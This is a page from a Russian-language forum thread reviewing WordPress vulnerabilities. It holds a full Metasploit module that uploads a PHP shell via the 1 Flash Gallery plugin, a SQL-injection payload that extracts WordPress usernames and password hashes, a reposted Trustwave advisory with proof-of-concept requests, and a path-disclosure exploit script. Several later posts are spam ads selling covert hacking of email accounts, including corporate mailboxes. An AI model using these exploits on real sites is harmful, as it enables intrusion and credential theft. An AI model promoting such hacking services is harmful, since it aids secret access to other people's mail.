ГлавнаяРегистрацияВход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 7 из 7
  • «
  • 1
  • 2
  • 5
  • 6
  • 7
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей WordPress
Обзор уязвимостей WordPress
DecideДата: Среда, 14.11.2012, 11:09 | Сообщение # 91
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)

Цитата:

# # Поиск в гугле: inurl:"wp-content/plugins/1-flash-gallery"

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => '1 Flash Gallery Wordpress Plugin File Upload Exploit',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in
the '1 Flash Gallery' Wordpress plugin.
},
'Author' => [ 'Ben Schmidt'],
'License' => MSF_LICENSE,
'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# POST request, so it's possible this might be smaller (maybe?)
# but very unlikely.
'Space' => 262144, # 256k
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 6, 2011'
))

register_options([
OptString.new('URI', [true, "Path to Wordpress", "/"]),
], self.class)
end

def exploit
boundary = rand_text_alphanumeric(6)
fn = rand_text_alphanumeric(8)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
data << payload.encoded
data << "\r\n--#{boundary}--"

res = send_request_raw({
'uri' => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
}
}, 25)

if (res)
print_status("Successfully uploaded shell.")
shell_path = res.body.split("_")[0]
print_status("Trying to access shell at #{shell_path}...")
res = send_request_raw({
'uri' => datastore['URI'] + shell_path,
'method' => 'GET',
}, 0.01)

else
print_error("Error uploading shell")
end

handler
end
end
 
DecideДата: Среда, 14.11.2012, 11:09 | Сообщение # 92
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
easy-color-manager #plugin# shell upload

Code
...  
<?php endif; ?>  
<tr valign="top">  
<th scope="row"><?php _e('Upload Image'); ?></th>  
<td><form enctype="multipart/form-data" id="upload-form" method="post" action="">  
<label for="upload"><?php _e('Choose an image from your computer:'); ?></label><br /><input type="file" id="upload" name="body" /><br />  
<input type="hidden" name="action" value="save" />  
<select name="image-part" id="image-part">  
<?php    foreach( array_keys( $this->background_part_array ) as $key ){  
         if( $this->background_part_array[$key]['type'] === 'navigation-02' ){  
             echo '<option value="'. $key .'-background">'. $this->background_part_array[$key]['name'] .' 背景';  
             echo '<option value="'. $key .'-panel">'. $this->background_part_array[$key]['name'] .' パネル' ;  
         } else {  
             echo '<option value="'. $key .'">'. $this->background_part_array[$key]['name']  ;   
         }  
     }  
?>  
</select>  
<?php wp_nonce_field('color-manager-upload', '_wpnonce-color-manager-upload') ?>  
<input type="submit" class="button" value="<?php esc_attr_e('Upload'); ?>" /><br />  
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。    
</p>  
</form>  
</td>  
...
 
DecideДата: Среда, 14.11.2012, 11:10 | Сообщение # 93
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
glossy #plugin# sql-inj

Code
glossy.admin.addEntry.php
PHP код:
  ...  
                 $entryName = $_POST['gs_entry_name'];  
                 $entryTitle = $_POST['gs_entry_title'];  
                 $entryLink = $_POST['gs_entry_link'];  
                 $entryDimensions = $_POST['gs_entry_dimensions'];  
                 $entryContents = $_POST['gs_entry_contents'];  
                   
                 $saveEntry = gs_save_entry($entryName, $entryTitle, $entryLink, $entryDimensions, $entryContents, $pageAction, $entryOriginalName);  
                   
                 // If $saveEntry is empty (no errors) and we've been adding, switch to editing mode  
                 if (empty($saveEntry))  
                 {  
                     $completedAction = $pageAction;  
                       
                     $pageAction = "Edit";  
                     $entryOriginalName = $entryName;  
                 }  
...


glossy.admin.addEntry.php
Code
...  
             } else if ($entryAction == "Add" || $entryName != $entryOriginalName) {  
                 $query = $wpdb->prepare("SELECT gs_name FROM ". $gs_tableName ." WHERE gs_name = '%s';", $entryName);  
                 $existingName = $wpdb->get_var($query);  
                   
                 if ($existingName)  
                 {  
                     $saveData = false;  
                     $errorFields['entryName'] = 'taken';  
                 }  
             }  
...


Code
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user  _login,user_pass)+from+wp_users+--+
 
DecideДата: Среда, 14.11.2012, 11:11 | Сообщение # 94
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
WordPress <= 3.3.1 Multiple Vulnerabilities

Code
Trustwave's SpiderLabs Security Advisory TWSL2012-002:  
Multiple Vulnerabilities in WordPress  
https://www.trustwave.com/spiderl....; 
Published: 1/24/12  
Version: 1.0  
Vendor: WordPress (http://wordpress.org/)  
Product: WordPress  
Version affected: 3.3.1 and prior  
Product description:  
WordPress is a free and open source blogging tool and publishing platform  
powered by PHP and MySQL.  
Credit: Jonathan Claudius of Trustwave SpiderLabs  
Finding 1: PHP Code Execution and Persistent Cross Site Scripting  
Vulnerabilities via 'setup-config.php' page.  
CVE: CVE-2011-4899  
The WordPress 'setup-config.php' installation page allows users to install  
WordPress in local or remote MySQL databases. This typically requires a user  
to have valid MySQL credentials to complete.  However, a malicious user can  
host their own MySQL database server and can successfully complete the  
WordPress installation without having valid credentials on the target system.  
After the successful installation of WordPress, a malicious user can inject  
malicious PHP code via the WordPress Themes editor.  In addition, with control  
of the database store, malicious Javascript can be injected into the content  
of WordPress yielding persistent Cross Site Scripting.  
Proof of Concept:  
Servers Involved  
A.B.C.D = Target WordPress Web Server  
W.X.Y.Z = Malicious User's MySQL Instance  
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306  
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance  
Request #1  
----------  
POST /wp-admin/setup-config.php?step=2 HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1  
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 81  
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit  
Request #2  
----------  
GET /wp-admin/install.php HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2  
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do  
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT  
3.) Get PHP Code Execution  
Malicious user edits 404.php via Themes Editor as follows:  
<?php  
phpinfo();  
?>  
Note #1: Any php file in the theme could be used.  
Note #2: Depending settings, PHP may be used to execute system commands  
          on webserver.  
Malicious user performs get request of modified page to execute code.  
Request  
-------  
GET /wp-content/themes/default/404.php HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
4.) Get Persistent Cross Site Scripting  
Malicious User Injects Malicious Javascript into their own MySQL database instance  
MySQL Query  
-----------  
update wp_comments SET  
comment_content='<script>alert('123')</script>' where comment_content='Hi,  
this is a comment.<br />To delete \ a comment, just log in and view the  
post's comments. There you will have the option to edit or delete  
them.';  
Non-malicious User Visits Wordpress installation and has Javascript executed on their browser  
Request  
-------  
GET /?p=1 HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Finding 2: Multiple Cross Site Scripting Vulnerabilities in  
'setup-config.php' page  
CVE: CVE-2012-0782  
The WordPress 'setup-config.php' installation page allows users to install  
WordPress in local or remote MySQL databases. When using this installation page  
the user is asked to supply the database name, the server that the database  
resides on, and a valid MySQL username and password.  
During this process, malicious users can supply javascript within  
the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission  
button, the javascript is rendered in the client's browser.  
Proof of Concept:  
Servers Involved  
A.B.C.D = Target WordPress Web Server  
Request  
-------  
POST /wp-admin/setup-config.php?step=2 HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 112  
dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscrip  t%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit  
Finding 3: MySQL Server Username/Password Disclosure Vulnerability via  
'setup-config.php' page  
CVE: CVE-2011-4898  
The WordPress 'setup-config.php' installation page allows users to install  
WordPress in local or remote MySQL databases. When using this installation page  
the user is asked to supply the database name, the server the database resides  
on, and a valid MySQL username and password.  
Malicious users can omit the "dbname" parameter during this process, allowing  
them to continually bruteforce MySQL instance usernames and passwords. This  
includes any local or remote MySQL instances which are accessible to the  
target web server. This can also be used as a method to proxy MySQL bruteforce  
attacks against other MySQL instances outside of the target organization.  
Proof of Concept:  
Servers Involved  
A.B.C.D = Target WordPress Web Server  
L.M.N.O = Any MySQL Server for which the Web Server has network access  
Request  
-------  
POST /wp-admin/setup-config.php?step=2 HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 32  
uname=mysql&pwd=mysql&dbhost=L.M.N.O  
Response (If Password is Valid)  
-------------------------------  
<---snip-->  
We were able to connect to the database server (which means your username  
and password is okay) but not able to select the database.  
<---snip-->  
Response (If Password is Invalid)  
---------------------------------  
<---snip-->  
This either means that the username and password information in your  
wp-config.php file is incorrect or we can't contact the database server at  
localhost. This could mean your host's database server is down.  
<---snip-->  
Vendor Response:  
Due to the fact that the component in question is an installation script,  
the vendor has stated that the attack surface is too small to warrant  
a fix:  
"We give priority to a better user experience at the install process. It is  
unlikely a user would go to the trouble of installing a copy of WordPress  
and then not finishing the setup process more-or-less immediately. The  
window of opportunity for exploiting such a vulnerability is very small."  
However, Trustwave SpiderLabs urges caution in situations where the  
WordPress installation script is provided as part of a default image.  
This is  often done as a convenience on hosting providers, even in  
cases where the client does not use the software. It is a best practice  
to ensure  that no installation scripts are exposed to outsiders, and  
these vulnerabilities reinforce the importance of this step.  
Remediation Steps:  
No official fix for these issues will be released for the WordPress  
publishing platform. However, administrators can mitigate these issues by  
creating strong MySQL passwords and defining rules within a web application  
firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has  
added rules to the commercial rules feed for these issues, and Trustwave's  
vulnerability scanning solution, TrustKeeper, has been updated to detect  
exposed installation scripts.  
Vendor Communication Timeline:  
12/22/11 - Vulnerability disclosed  
01/16/12 - Confirmation to release vulnerabilities  
01/24/12 - Advisory published  
References  
1. http://www.wordpress.org  
About Trustwave:  
Trustwave is the leading provider of on-demand and subscription-based  
information security and payment card industry compliance management  
solutions to businesses and government entities throughout the world. For  
organizations faced with today's challenging data security and compliance  
environment, Trustwave provides a unique approach with comprehensive  
solutions that include its flagship TrustKeeper compliance management  
software and other proprietary security solutions. Trustwave has helped  
thousands of organizations--ranging from Fortune 500 businesses and large  
financial institutions to small and medium-sized retailers--manage  
compliance and secure their network infrastructure, data communications and  
critical information assets. Trustwave is headquartered in Chicago with  
offices throughout North America, South America, Europe, Africa, China and  
Australia. For more information, visit https://www.trustwave.com  
About Trustwave's SpiderLabs:  
SpiderLabs(R) is the advanced security team at Trustwave focused on  
application security, incident response, penetration testing, physical  
security and security research. The team has performed over a thousand  
incident investigations, thousands of penetration tests and hundreds of  
application security tests globally. In addition, the SpiderLabs Research  
team provides intelligence through bleeding-edge research and proof of  
concept tool development to enhance Trustwave's products and services.  
https://www.trustwave.com/spiderlabs  
Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
 
DecideДата: Среда, 14.11.2012, 11:12 | Сообщение # 95
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Раскрытие путей в WordPress >= 3.31

Code
Exploit (Exploit OsWpFp v.0.5):
PHP код:
  <form method=GET>  
<input type=text name=url>  
<input type=submit value="Check URL">  
</form>  
<?php  
$url = $_GET['url']; //URL Site  
$site=$url.'/wp-includes/admin-bar.php';  
$e = @file_get_contents($site);  
if($e and $e !== "")  
  {  
$a = array("<br />\n<b>Fatal error</b>:  Call to undefined function add_action() in "," on line <b>39</b><br />","/wp-includes/admin-bar.php","<br />\n<b>Fatal error</b>:  Call to undefined function  add_action() in ","Fatal error: Call to undefined function add_action() in "," on line 39");  
for($i=0; $i < count($a); ++$i)  
  {  
  $e = explode($a[$i],$e);  
  $e = implode("",$e);  
  }  
echo "<hr size=1><span style=\"font-family: Calibri;\">Full path site <b>".$url."</b>:<br>".$e."<hr size=1>/*Exploit By Osstudio*/<br>\nICQ: 375647532</span>";  
/*Exploit By Osstudio*/  
}  
else  
  {  
  echo "Ожидание ввода, либо не удалось использовать!";  
  }  
?>
 
DecideДата: Среда, 14.11.2012, 11:13 | Сообщение # 96
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
Раскрытие путей wp <= 3.4.1

Code
/wp-settings.php
  /wp-includes/admin-bar.php
  /wp-includes/author-template.php
  /wp-includes/canonical.php
  /wp-includes/category-template.php
  /wp-includes/class-feed.php
  /wp-includes/class-snoopy.php
  /wp-includes/class-wp-http-ixr-client.php
  /wp-includes/class-wp-xmlrpc-server.php
  /wp-includes/class.wp-scripts.php
  /wp-includes/class.wp-styles.php
  /wp-includes/comment-template.php
  /wp-includes/default-filters.php
  /wp-includes/default-widgets.php
  /wp-includes/feed-atom-comments.php
  /wp-includes/feed-atom.php
  /wp-includes/feed-rdf.php
  /wp-includes/feed-rss.php
  /wp-includes/feed-rss2-comments.php
  /wp-includes/feed-rss2.php
  /wp-includes/general-template.php
  /wp-includes/kses.php
  /wp-includes/media.php
  /wp-includes/ms-default-constants.php
  /wp-includes/ms-default-filters.php
  /wp-includes/ms-functions.php
  /wp-includes/ms-settings.php
  /wp-includes/nav-menu-template.php
  /wp-includes/post-template.php
  /wp-includes/post.php
  /wp-includes/registration-functions.php
  /wp-includes/registration.php
  /wp-includes/rss-functions.php
  /wp-includes/rss.php
  /wp-includes/script-loader.php
  /wp-includes/shortcodes.php
  /wp-includes/taxonomy.php
  /wp-includes/template-loader.php
  /wp-includes/theme.php
  /wp-includes/update.php
  /wp-includes/user.php
  /wp-includes/vars.php
  /wp-includes/theme-compat/comments-popup.php
  /wp-includes/theme-compat/comments.php
  /wp-includes/theme-compat/footer.php
  /wp-includes/theme-compat/header.php
  /wp-includes/theme-compat/sidebar.php
  /wp-content/themes/тема/404.php
  /wp-content/themes/тема/archive.php
  /wp-content/themes/тема/author.php
  /wp-content/themes/тема/category.php
  /wp-content/themes/тема/comments.php
  /wp-content/themes/тема/content.php
  /wp-content/themes/тема/footer.php
  /wp-content/themes/тема/functions.php
  /wp-content/themes/тема/image.php
  /wp-content/themes/тема/index.php
  /wp-content/themes/тема/page.php
  /wp-content/themes/тема/search.php
  /wp-content/themes/тема/showcase.php
  /wp-content/themes/тема/sidebar.php
  /wp-content/themes/тема/single.php
  /wp-content/themes/тема/tag.php
 
reversДата: Четверг, 25.05.2017, 09:21 | Сообщение # 97
Рядовой
Группа: Пользователи
Сообщений: 7
Репутация: 0
Статус: Offline
++++ ВНИМАНИЕ! ВНИМАНИЕ! ВНИМАНИЕ! +++++

ВАМ НУЖЕН АНОНИМНЫЙ ВЗЛОМ ПОЧТЫ?
ВЫ ХОТИТЕ ЧТОБЫ ХОЗЯИН ПОЧТЫ НИ О ЧЕМ НЕ УЗНАЛ?
ВАМ НУЖНЫ КАЧЕСТВЕННЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА ПОЧТЫ?
ВЫ СОМНЕВАЕТЕСЬ ЗАКАЗЫВАТЬ У КОГО ТО?


МЫ ВАМ ПОМОЖЕМ!
ЧТО МЫ ПРЕДЛАГАЕМ:

  • ВЗЛОМ ПОЧТЫ БЕЗ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ

  •  ВЗЛОМ ПОЧТЫ БЕЗ ИЗМЕНЕНИЯ ПАРОЛЯ, ЖЕРТВА НИЧЕГО НЕ УЗНАЕТ

  •  МЫ ПРЕДОСТАВИМ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА КАКИЕ ПОПРОСИТЕ

  •  МЫ ЛОМАЕМ АНОНИМНО, НИ КАКИХ ВАШИХ ДАННЫХ НЕ НУЖНО

  •  МЫ БЕРЕМСЯ ЗА РАБОТУ СРАЗУ КАК ТОЛЬКО ПОЛУЧАЕМ ЗАКАЗ, НЕ НУЖНО ЖДАТЬ ПОДТВЕРЖДЕНИЯ

  •  ОПЛАТИТЬ МОЖНО НЕ ИМЕЯ КОШЕЛЬКА \СЧЕТА

  • КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА

  • ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ

    Код
    Mail.ru
    Yandex.ru
    Rambler.ru
    Gmail.com
    Корпоративные почтовые ящики тоже ломаем.


    НАШИ КОНТАКТЫ
    САЙТ: WWW.POCHTY.COM
    ICQ: 318-319

    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
    =
  •  
    uawadДата: Пятница, 04.08.2017, 02:25 | Сообщение # 98
    Рядовой
    Группа: Пользователи
    Сообщений: 6
    Репутация: 0
    Статус: Offline
    ПРЕДЛАГАЕМ УСЛУГИ ПО ВЗЛОМУ ПОЧТОВЫХ ЯЩИКОВ


    Самые низкие цены?

    Любые доказательства взлома?

    Без смены пароля, пароль при взломе не меняется
    ?
    Сроки взлома от супер срочного до 7и дней?

    Анонимность гарантию 1000%?

    Гарантия от смены пароля?

    Оплатить взлом почты можно в любом терминале?

    Цитата

    Mail.ru
    Yandex.ru
    Rambler.ru
    Gmail.com
    Корпоративные почтовые ящики тоже ломаем.

     

    1) НИКАКОЙ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ ВЗЛОМА
    2) ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА, обговаривается индивидуально (скриншот, чтение письма, смена информации)
    3) ПАРОЛЬ ПРИ ВЗЛОМЕ НЕ МЕНЯЕТСЯ, ЖЕРТВА НИ ЧЕГО НЕ ЗАПОДОЗРИТ
    4) АНОНИМНОСТЬ, НИ КАКИХ ЛИЧНЫХ ДАННЫХ. КОНФИДЕНЦИАЛЬНО НА ВСЕ 1000%
    5) ОПЛАТИТЬ МОЖНО В ЛЮБОМ ТЕРМИНАЛЕ, НЕ ИМЕЯ СВОЕГО КОШЕЛЬКА
    6) КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА
    7) ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ


    бесплатно не работаем. скидки после 2х заказов.
    доказательства скрин, чтение вашего письма, смена данных на время, и д.р.


    ДЛЯ СВЯЗИ И ЗАКАЗОВ:
    ICQ:318-319
    сайт http://pochty.com


     
     
    qa_joplДата: Среда, 09.08.2017, 16:41 | Сообщение # 99
    Рядовой
    Группа: Пользователи
    Сообщений: 15
    Репутация: 0
    Статус: Offline
    ++++ ВНИМАНИЕ! ВНИМАНИЕ! ВНИМАНИЕ! +++++

    ВАМ НУЖЕН АНОНИМНЫЙ ВЗЛОМ ПОЧТЫ?
    ВЫ ХОТИТЕ ЧТОБЫ ХОЗЯИН ПОЧТЫ НИ О ЧЕМ НЕ УЗНАЛ?
    ВАМ НУЖНЫ КАЧЕСТВЕННЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА ПОЧТЫ?
    ВЫ СОМНЕВАЕТЕСЬ ЗАКАЗЫВАТЬ У КОГО ТО?


    МЫ ВАМ ПОМОЖЕМ!
    ЧТО МЫ ПРЕДЛАГАЕМ:

  • ВЗЛОМ ПОЧТЫ БЕЗ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ

  •  ВЗЛОМ ПОЧТЫ БЕЗ ИЗМЕНЕНИЯ ПАРОЛЯ, ЖЕРТВА НИЧЕГО НЕ УЗНАЕТ

  •  МЫ ПРЕДОСТАВИМ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА КАКИЕ ПОПРОСИТЕ

  •  МЫ ЛОМАЕМ АНОНИМНО, НИ КАКИХ ВАШИХ ДАННЫХ НЕ НУЖНО

  •  МЫ БЕРЕМСЯ ЗА РАБОТУ СРАЗУ КАК ТОЛЬКО ПОЛУЧАЕМ ЗАКАЗ, НЕ НУЖНО ЖДАТЬ ПОДТВЕРЖДЕНИЯ

  •  ОПЛАТИТЬ МОЖНО НЕ ИМЕЯ КОШЕЛЬКА \СЧЕТА

  • КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА

  • ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ

    Код
    Mail.ru
    Yandex.ru
    Rambler.ru
    Gmail.com
    Корпоративные почтовые ящики тоже ломаем.


    НАШИ КОНТАКТЫ
    САЙТ: WWW.POCHTY.COM
    ICQ: 318-319
  •  
    greval2008Дата: Вторник, 12.12.2017, 19:20 | Сообщение # 100
    Рядовой
    Группа: Пользователи
    Сообщений: 6
    Репутация: 0
    Статус: Offline
    ++++++++++++++  ПРОВЕРЕННЫЙ СЕРВИС ++++++++++++++ 
    ВЗЛАМЫВАЕМ ЛЮБЫЕ ПОЧТЫ
    ВЗЛАМЫВАЕМ 24 ЧАСА В СУТКИ

    ЛОМАЕМ ДАЖЕ ТЕ ПОЧТЫ ОТ КОТОРЫХ ОТКАЗАЛИСЬ ДРУГИЕ ВЗЛОМЩИКИ

    ВОССТАНАВЛИВАЕМ ЗАБЫТЫЕ ПАРОЛИ


    Цитата
    НАШ САЙТ WWW.XAKMAIL.COM


    ЛОМАЕМ ПОЧТЫ ЛЮБЫХ СЕРВИСОВ

    САМЫЕ НИЗКИЕ ЦЕНЫ
    ЛЮБЫЕ ГАРАНТИИ
    ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА
    СКИДКИ И БОНУСЫ

    ВЫ ВСЕ ЕЩЕ ИЩИТЕ ПРОВЕРЕННОГО ВЗЛОМЩИКА?
    ЗАКАЖИТЕ У НАС! УБЕДИТЕСЬ!И БУДИТЕ ПОСТОННЫМ КЛИЕНТОМ!

    ЗАПИШИТЕ + ЗАПОМНИТЕ + ЗАХОДИТЕ    
    www.XakMail.com


    взлом почты, e-mail, подобрать пароль к ящику, пароля почтового ящика, ящика, паролей, посмотреть переписку, недорого заказ взломать мыла заказать, профессиональный, мыло, вскрыть, недорого, дешевый, быстро, анонимно, низкие, цены, stealth, e-mail, hacker, group, mail-psw, com, mail. ru, маил. ру, мой мир, получит, доступ, яндекс, рамблер, гмаил, серсив, пасс, аккаунтов, мейла, gmail, rambler, yandex, yahoo

     
    Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей WordPress
    • Страница 7 из 7
    • «
    • 1
    • 2
    • 5
    • 6
    • 7
    Поиск:

    Пятница, 29.03.2024, 15:34
    Copyright MyCorp © 2024Бесплатный хостинг uCoz